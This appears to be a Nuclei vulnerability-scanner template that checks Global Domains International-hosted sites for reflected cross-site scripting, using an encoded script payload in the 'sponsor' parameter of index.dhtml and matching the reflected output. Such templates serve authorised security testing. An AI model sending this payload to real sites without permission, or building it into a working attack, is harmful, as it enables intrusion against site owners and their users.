id: global-domains-xss

info:
  name: Global Domains International - Cross-Site Scripting
  author: princechaddha
  severity: high
  description: |
    Sites hosted by Global Domains International, Inc. have cross-site scripting and directory traversal vulnerabilities.
  reference:
    - https://cxsecurity.com/issue/WLB-2018020247
    - https://packetstormsecurity.com/files/126545/Global-Domains-International-Cross-Site-Scripting-Traversal.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: globaldomains,xss,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 490a00463044022013ac4203bc7c6203e95417cb912d11cf2cf1d8ed31f394bcfdfe45ce2f1b5ffa0220653bf907679b4b39de8e4117b26606d1cc7bc11084f7bd33c7a42a07aefc0e54:922c64590222798bb761d5b6d8e72950
